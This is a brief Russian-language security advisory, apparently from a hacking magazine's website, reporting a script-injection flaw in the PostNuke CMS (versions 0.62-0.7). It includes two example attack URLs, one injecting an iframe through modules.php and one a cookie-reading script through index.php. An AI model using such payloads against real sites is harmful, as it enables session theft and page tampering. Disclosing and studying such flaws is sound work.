Витрина продуктов

Все продукты →
  • Подписка на «Хакер»

    Все статьи, архив и бонусы

    6000 ₽ / год

    Оформить
  • Печатный журнал

    Легендарный в твоём формате

    710 ₽ / номер

    Купить
  • Онлайн-курсы

    Практические навыки от экспертов

    от 9000 ₽

    Выбрать

PostNuke - система управления сайтом
написанная на php и доступная для Windows и Linux. 

Уязвимость позволяет выполнить произвольный
код при помощи сценариев modules.php и index.php. 

Пример: 

http://one_of_100's_of_sites/modules.php? op=modload&name=<iframe%20src="http://www.microsoft.com">

http://one_of_100's_of_sites/index.php? catid=<script>alert (document.cookie)</script>

Уязвимость найдена в PostNuke Development Team PostNuke 0.62-0.7.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии